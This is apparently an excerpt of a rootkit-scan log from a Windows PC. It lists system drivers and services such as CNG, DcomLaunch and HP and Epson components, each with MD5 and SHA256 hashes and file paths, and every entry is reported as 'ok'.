17:32:37.0662 0x1b50 [ 569B54004A7E85A74FD92841DE6058E2, 58949313D0F6B1C06359B2F3C68E29940B1655A17E93FFC3718F6D2EAE1633E4 ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

17:32:37.0742 0x1b50 clr_optimization_v4.0.30319_64 - ok

17:32:37.0782 0x1b50 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys

17:32:37.0802 0x1b50 CmBatt - ok

17:32:37.0832 0x1b50 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\Windows\system32\drivers\cmdide.sys

17:32:37.0852 0x1b50 cmdide - ok

17:32:37.0892 0x1b50 [ A98CED39AD91B445E2E442A9BD67E8B4, B4189DEEF1C0EE22AE983119047B1A40FFDD8F3E163DFFABD7C2706231B0B1B0 ] CNG C:\Windows\system32\Drivers\cng.sys

17:32:37.0962 0x1b50 CNG - ok

17:32:38.0052 0x1b50 [ F9A79C5B27037821112C50A9C8FB367A, D9990AE1A0CA767E54C9D3FD2C6EA2A068DFD5A270102E915F71648A0C59097B ] Com4QLBEx C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe

17:32:38.0082 0x1b50 Com4QLBEx - ok

17:32:38.0102 0x1b50 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys

17:32:38.0112 0x1b50 Compbatt - ok

17:32:38.0162 0x1b50 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\Windows\system32\drivers\CompositeBus.sys

17:32:38.0202 0x1b50 CompositeBus - ok

17:32:38.0232 0x1b50 COMSysApp - ok

17:32:38.0252 0x1b50 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\Windows\system32\DRIVERS\crcdisk.sys

17:32:38.0262 0x1b50 crcdisk - ok

17:32:38.0302 0x1b50 [ 2C6632CECFDBBE793FDA8AF9CA55A9CC, 335188515F798483660E529204A13012E4D21B0ECA489224A11C26F91A5B3CCE ] CryptSvc C:\Windows\system32\cryptsvc.dll

17:32:38.0342 0x1b50 CryptSvc - ok

17:32:38.0402 0x1b50 [ DC08465037FA57A5203BDF3E963422C2, ADA7F6B4ED68413924E187DA1A609BB7B7AA5E483055994A17AEBC7F1BCEC5F2 ] ctxusbm C:\Windows\system32\DRIVERS\ctxusbm.sys

17:32:38.0422 0x1b50 ctxusbm - ok

17:32:38.0482 0x1b50 [ 622C96AFB07BB82C8650B47172137AC4, B74CEA5A3F4945E5A3EAE7AF1B1FA75F611C65C6FACE393052A512FA81B0C17C ] DcomLaunch C:\Windows\system32\rpcss.dll

17:32:38.0582 0x1b50 DcomLaunch - ok

17:32:38.0622 0x1b50 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\Windows\System32\defragsvc.dll

17:32:38.0672 0x1b50 defragsvc - ok

17:32:38.0722 0x1b50 [ 9B38580063D281A99E68EF5813022A5F, D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA ] DfsC C:\Windows\system32\Drivers\dfsc.sys

17:32:38.0752 0x1b50 DfsC - ok

17:32:38.0862 0x1b50 [ 0F4A5D01156B948B54550375498B08A2, 1CAE3D744429A06E9C9EC46AC6B216AB68154EF8FACDD0721C47902B83820F56 ] dg_ssudbus C:\Windows\system32\DRIVERS\ssudbus.sys

17:32:38.0902 0x1b50 dg_ssudbus - ok

17:32:38.0952 0x1b50 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\Windows\system32\dhcpcore.dll

17:32:39.0042 0x1b50 Dhcp - ok

17:32:39.0152 0x1b50 [ EE9954237F15BE4DD9304D12E4D305ED, F295C9BAF20F0E669B673AFCC16B4969EE31B6A3808980DAB93D9B0F167DA3C0 ] DiagTrack C:\Windows\system32\diagtrack.dll

17:32:39.0322 0x1b50 DiagTrack - ok

17:32:39.0372 0x1b50 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\Windows\system32\drivers\discache.sys

17:32:39.0412 0x1b50 discache - ok

17:32:39.0462 0x1b50 [ 616387BBD83372220B09DE95F4E67BBC, 5E2D5280BB775576E7CDE3FA6BDE494E183123635E5908CF7EBF1FF52966D07D ] Disk C:\Windows\system32\drivers\disk.sys

17:32:39.0492 0x1b50 Disk - ok

17:32:39.0532 0x1b50 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\Windows\System32\dnsrslvr.dll

17:32:39.0612 0x1b50 Dnscache - ok

17:32:39.0672 0x1b50 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\Windows\System32\dot3svc.dll

17:32:39.0732 0x1b50 dot3svc - ok

17:32:39.0802 0x1b50 [ B42ED0320C6E41102FDE0005154849BB, 4DB872E23AD049C3C9FDC0759FC58BFA60DA91B18BC82B611BFA300D26DDFC7A ] Dot4 C:\Windows\system32\DRIVERS\Dot4.sys

17:32:39.0852 0x1b50 Dot4 - ok

17:32:39.0922 0x1b50 [ E9F5969233C5D89F3C35E3A66A52A361, C4BD35795C78FB11E6022372CB25DEB570730EFDAD3DC1584368235FF622638C ] Dot4Print C:\Windows\system32\drivers\Dot4Prt.sys

17:32:39.0972 0x1b50 Dot4Print - ok

17:32:40.0002 0x1b50 [ FD05A02B0370BC3000F402E543CA5814, 089B1113E640F495F470E8F57060B89546270481B309DC8ED3C3D13A849076A3 ] dot4usb C:\Windows\system32\DRIVERS\dot4usb.sys

17:32:40.0032 0x1b50 dot4usb - ok

17:32:40.0082 0x1b50 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\Windows\system32\dps.dll

17:32:40.0142 0x1b50 DPS - ok

17:32:40.0192 0x1b50 [ 26FE888505E5A945B0536AF9A2A27A6F, A6B16ED498BAFE300E1F0E0A241E3D62F7A1C5973EE775904ED14F33A2BC08A6 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys

17:32:40.0292 0x1b50 drmkaud - ok

17:32:40.0362 0x1b50 [ 3A9D7D464BDB3B70D7ECF689ADABBD4D, B4F5B23705EA1BA453FE30791CA245E1A5F7FBEABAD026E4A8A15A9FC44E8C9C ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys

17:32:40.0422 0x1b50 DXGKrnl - ok

17:32:40.0462 0x1b50 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll

17:32:40.0502 0x1b50 EapHost - ok

17:32:40.0622 0x1b50 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\DRIVERS\evbda.sys

17:32:40.0772 0x1b50 ebdrv - ok

17:32:40.0812 0x1b50 [ CA69E856332E2D85294665F6B7E97254, A9693F836907FB0154DC1090D9476F1E9242ABE922D932D74D0385772D2EAB65 ] EFS C:\Windows\System32\lsass.exe

17:32:40.0902 0x1b50 EFS - ok

17:32:40.0992 0x1b50 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe

17:32:41.0062 0x1b50 ehRecvr - ok

17:32:41.0092 0x1b50 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe

17:32:41.0152 0x1b50 ehSched - ok

17:32:41.0192 0x1b50 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\DRIVERS\elxstor.sys

17:32:41.0222 0x1b50 elxstor - ok

17:32:41.0252 0x1b50 [ 524C79054636D2E5751169005006460B, 1EBA5972E13C5BB07BBD94D6647B86469B4910F60A3C8BDDC6BB5736EF99C9C3 ] enecir C:\Windows\system32\DRIVERS\enecir.sys

17:32:41.0302 0x1b50 enecir - ok

17:32:41.0392 0x1b50 [ 883C49EABBA05A527DE97354B1A7AC82, 6A87883D90BEC956BF4DE1FB40AC516D1946691F5AD66BC35AA28E8F655B1BDD ] EpsonCustomerResearchParticipation C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe

17:32:41.0432 0x1b50 EpsonCustomerResearchParticipation - ok

17:32:41.0492 0x1b50 [ D315FF43E23DF424ECEC2F6C930203E4, 68940EDA34DC4945CDD0D8018D96A0DA8F99F16A930946D14E4FECEE033FCB80 ] EpsonScanSvc C:\Windows\system32\EscSvc64.exe

17:32:41.0512 0x1b50 EpsonScanSvc - ok

17:32:41.0572 0x1b50 [ 86032A47AD0105130FE7808C903E2086, ACCCA35483B7E8F9FC72A65031E024C469DF94FCCF2C5CC37C9B3BED4F1C676E ] EPSON_PM_RPCV4_06 C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE

17:32:41.0592 0x1b50 EPSON_PM_RPCV4_06 - ok

17:32:41.0632 0x1b50 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys

17:32:41.0672 0x1b50 ErrDev - ok

17:32:41.0732 0x1b50 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll

17:32:41.0802 0x1b50 EventSystem - ok

17:32:41.0832 0x1b50 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\Windows\system32\drivers\exfat.sys

17:32:41.0892 0x1b50 exfat - ok

17:32:41.0922 0x1b50 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\Windows\system32\drivers\fastfat.sys

17:32:41.0962 0x1b50 fastfat - ok

17:32:42.0042 0x1b50 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe

17:32:42.0082 0x1b50 Fax - ok

17:32:42.0102 0x1b50 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\DRIVERS\fdc.sys

17:32:42.0122 0x1b50 fdc - ok

17:32:42.0152 0x1b50 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll

17:32:42.0202 0x1b50 fdPHost - ok

17:32:42.0222 0x1b50 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll

17:32:42.0282 0x1b50 FDResPub - ok

17:32:42.0312 0x1b50 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys

17:32:42.0322 0x1b50 FileInfo - ok

17:32:42.0332 0x1b50 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys

17:32:42.0382 0x1b50 Filetrace - ok

17:32:42.0402 0x1b50 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys

17:32:42.0422 0x1b50 flpydisk - ok

17:32:42.0442 0x1b50 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys

17:32:42.0482 0x1b50 FltMgr - ok

17:32:42.0582 0x1b50 [ CF0108CBA6D1860563BA20E3D74C6646, 737B5E89A858D7E3AEC8BF660AA4FCC56501A69468EA143531286016AF7C0B33 ] FontCache C:\Windows\system32\FntCache.dll

17:32:42.0712 0x1b50 FontCache - ok

17:32:42.0772 0x1b50 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

17:32:42.0792 0x1b50 FontCache3.0.0.0 - ok

17:32:42.0822 0x1b50 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys

17:32:42.0852 0x1b50 FsDepends - ok

17:32:42.0882 0x1b50 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys

17:32:42.0892 0x1b50 Fs_Rec - ok

17:32:42.0952 0x1b50 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys

17:32:42.0982 0x1b50 fvevol - ok

17:32:43.0002 0x1b50 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\DRIVERS\gagp30kx.sys

17:32:43.0022 0x1b50 gagp30kx - ok

17:32:43.0092 0x1b50 [ C44D560E441F091EA3B72F778EC60DE2, 1F90BA0E98C436B98BF6B0BC93146B52C081DF374424E2DCA270316D508A59B2 ] GameConsoleService C:\Program Files (x86)\HP Games\HP Game Console\GameConsoleService.exe

17:32:43.0122 0x1b50 GameConsoleService - ok

17:32:43.0182 0x1b50 [ E4AE497857409127ED57562AF913A903, 262ADD713B1FBF6200550967D1F8635B55D01BBD8FA2E753536E71A4EC87867B ] gpsvc C:\Windows\System32\gpsvc.dll

17:32:43.0282 0x1b50 gpsvc - ok

17:32:43.0372 0x1b50 [ DD7423ABBE2913E70D50E9318AD57EE4, 74BC123808F3FA60ADDC51C1383F8250608D3DBA3A8DC175B3418A1CF0BC53E9 ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

17:32:43.0402 0x1b50 gupdate - ok

17:32:43.0442 0x1b50 [ DD7423ABBE2913E70D50E9318AD57EE4, 74BC123808F3FA60ADDC51C1383F8250608D3DBA3A8DC175B3418A1CF0BC53E9 ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

17:32:43.0462 0x1b50 gupdatem - ok

17:32:43.0502 0x1b50 [ 5D4BC124FAAE6730AC002CDB67BF1A1C, 00294F4DC7D17F6DD2A22B9C3299BED40146BA45C972367154D20DB502472551 ] gusvc C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe

17:32:43.0512 0x1b50 gusvc - ok

17:32:43.0542 0x1b50 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys

17:32:43.0602 0x1b50 hcw85cir - ok

17:32:43.0652 0x1b50 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys

17:32:43.0692 0x1b50 HdAudAddService - ok

17:32:43.0742 0x1b50 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys

17:32:43.0782 0x1b50 HDAudBus - ok

17:32:43.0802 0x1b50 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\DRIVERS\HidBatt.sys

17:32:43.0832 0x1b50 HidBatt - ok

17:32:43.0872 0x1b50 [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth C:\Windows\system32\DRIVERS\hidbth.sys

17:32:43.0902 0x1b50 HidBth - ok

17:32:43.0942 0x1b50 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\DRIVERS\hidir.sys

17:32:43.0982 0x1b50 HidIr - ok

17:32:44.0012 0x1b50 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\System32\hidserv.dll

17:32:44.0092 0x1b50 hidserv - ok

17:32:44.0142 0x1b50 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys

17:32:44.0182 0x1b50 HidUsb - ok

17:32:44.0212 0x1b50 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll

17:32:44.0262 0x1b50 hkmsvc - ok

17:32:44.0302 0x1b50 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll

17:32:44.0382 0x1b50 HomeGroupListener - ok

17:32:44.0412 0x1b50 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll

17:32:44.0452 0x1b50 HomeGroupProvider - ok

17:32:44.0482 0x1b50 [ 4E0BEC0F78096FFD6D3314B497FC49D3, 15B545815D0C80102963FFF13B6643CC9A74717137C1CBA45345B18912E72DB6 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys

17:32:44.0492 0x1b50 hpdskflt - ok

17:32:44.0522 0x1b50 [ 9AF482D058BE59CC28BCE52E7C4B747C, 2D150CD0C82B575CDE2E1B3941FD72EFCB254850D6FF1D7C40D3B29643018EFF ] HpqKbFiltr C:\Windows\system32\DRIVERS\HpqKbFiltr.sys

17:32:44.0592 0x1b50 HpqKbFiltr - ok

17:32:44.0682 0x1b50 [ 7B7DE6B3DC30F3246958F42C67A6F7BB, 4B66B90CFEC2231B905B21DECC4EC7C6500E546F080A452EF67E724EDF37ADD9 ] hpqwmiex C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe

17:32:44.0732 0x1b50 hpqwmiex - ok

17:32:44.0772 0x1b50 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys

17:32:44.0792 0x1b50 HpSAMD - ok

17:32:44.0812 0x1b50 [ FC7C13B5A9E9BE23B7AE72BBC7FDB278, E85A7BF1CFE52BA7D663A1ED48A4F8874EFBDDF48979138F7E3E24817705B6A1 ] hpsrv C:\Windows\system32\Hpservice.exe

17:32:44.0832 0x1b50 hpsrv - ok

17:32:44.0912 0x1b50 [ EC80F3ECC5F8543E22BBCB037D837CA9, 23A4AE80A6C317CE77BD9D352CD9CED8649E3AD98A7C0A2044138BB20B46F398 ] HPSupportSolutionsFrameworkService C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe

17:32:44.0942 0x1b50 HPSupportSolutionsFrameworkService - ok

17:32:45.0002 0x1b50 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP C:\Windows\system32\drivers\HTTP.sys

17:32:45.0082 0x1b50 HTTP - ok

17:32:45.0122 0x1b50 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys

17:32:45.0132 0x1b50 hwpolicy - ok

17:32:45.0182 0x1b50 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys

17:32:45.0202 0x1b50 i8042prt - ok

17:32:45.0312 0x1b50 [ 7548066DF68A8A1A56B043359F915F37, 6225DDE554E45858374CBD284A85A00F773089A667C08492187A637232B8BD9A ] IAANTMON C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe

17:32:45.0342 0x1b50 IAANTMON - ok

17:32:45.0402 0x1b50 [ 1D004CB1DA6323B1F55CAEF7F94B61D9, 8FFFB429BA46938724BBB87AB9B3EC77EA17C4B893BABDBDD38309F02963D405 ] iaStor C:\Windows\system32\DRIVERS\iaStor.sys

17:32:45.0422 0x1b50 iaStor - ok

17:32:45.0462 0x1b50 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys

17:32:45.0482 0x1b50 iaStorV - ok

17:32:45.0552 0x1b50 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe

17:32:45.0602 0x1b50 idsvc - ok

17:32:45.0632 0x1b50 IEEtwCollectorService - ok

17:32:45.0932 0x1b50 [ 3C3F27002ABC69C5AFE29CBE6CF7ADDF, 1543345ED76F0FEF907A32E0838F8B01F0FB361565B13ADD34F552FF48D38DD6 ] igfx C:\Windows\system32\DRIVERS\igdkmd64.sys

17:32:46.0282 0x1b50 igfx - ok

17:32:46.0322 0x1b50 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\DRIVERS\iirsp.sys

17:32:46.0342 0x1b50 iirsp - ok

17:32:46.0412 0x1b50 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll

17:32:46.0482 0x1b50 IKEEXT - ok

17:32:46.0552 0x1b50 [ 88A20FA54C73DED4E8DAC764E9130AE9, BBD9C8D12063F0A464FE0C48C6913A772EF5A5DCB8A00EBD37E494DCB752A5FF ] IntcHdmiAddService C:\Windows\system32\drivers\IntcHdmi.sys

17:32:46.0612 0x1b50 IntcHdmiAddService - ok

17:32:46.0652 0x1b50 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys

17:32:46.0662 0x1b50 intelide - ok

17:32:46.0692 0x1b50 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys

17:32:46.0722 0x1b50 intelppm - ok

17:32:46.0752 0x1b50 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll

17:32:46.0812 0x1b50 IPBusEnum - ok

17:32:46.0842 0x1b50 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys

17:32:46.0892 0x1b50 IpFilterDriver - ok

17:32:46.0952 0x1b50 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll

17:32:47.0072 0x1b50 iphlpsvc - ok

17:32:47.0112 0x1b50 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys

17:32:47.0162 0x1b50 IPMIDRV - ok

17:32:47.0192 0x1b50 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys

17:32:47.0252 0x1b50 IPNAT - ok

17:32:47.0282 0x1b50 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys

17:32:47.0322 0x1b50 IRENUM - ok

17:32:47.0352 0x1b50 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys

17:32:47.0372 0x1b50 isapnp - ok

17:32:47.0402 0x1b50 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys

17:32:47.0422 0x1b50 iScsiPrt - ok

17:32:47.0442 0x1b50 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys

17:32:47.0462 0x1b50 kbdclass - ok

17:32:47.0482 0x1b50 [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys

17:32:47.0512 0x1b50 kbdhid - ok

17:32:47.0532 0x1b50 [ CA69E856332E2D85294665F6B7E97254, A9693F836907FB0154DC1090D9476F1E9242ABE922D932D74D0385772D2EAB65 ] KeyIso C:\Windows\system32\lsass.exe

17:32:47.0552 0x1b50 KeyIso - ok

17:32:47.0592 0x1b50 [ 3AAA10BAF3F194F7CD34F4C78F8222EE, 25AE0B764748B13C7F093966E228D506072E270379A5E751F1ED619DEFB40814 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys

17:32:47.0642 0x1b50 KSecDD - ok

17:32:47.0672 0x1b50 [ 7B7C28D4E71E4A4365F2B7528DA619F8, 0A507468C6A49870F794F28FF274643FE8FD238A3A9BE86C8656882F237DE77B ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys

17:32:47.0702 0x1b50 KSecPkg - ok

17:32:47.0832 0x1b50 [ 1E5DF166E54173F1A1C71B45F66F0DD0, 3B87CBDE7CD3CFF6E90CE142C4F0CE38C8C650EB329C1635BFFDD865D153D980 ] kss C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe

17:32:47.0872 0x1b50 kss - ok

17:32:47.0902 0x1b50 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys

17:32:47.0952 0x1b50 ksthunk - ok

